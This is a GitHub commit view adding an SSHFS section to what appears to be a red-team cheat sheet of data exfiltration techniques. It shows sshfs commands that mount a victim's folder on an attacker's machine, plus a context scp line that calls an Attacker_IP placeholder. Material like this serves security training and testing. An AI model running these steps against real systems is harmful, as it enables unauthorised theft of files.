Added in SSHFS mounting technique

I added in a SSHFS exfiltration technique. Good technique if you want to interact with the target system files and folders with a GUI or with applications on your system that are not present on the target system.
This commit is contained in:
OddRabbit 2022-07-06 20:22:29 +10:00 committed by GitHub
parent 792413b4bf
commit 0fd29932d7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -216,6 +216,18 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename>
```
# SSHFS
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
In this example, the victim is located at the IP address "192.168.0.68", the victim username is "bob" and the folder to mount is specified after the colon.
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
```
## NC
```bash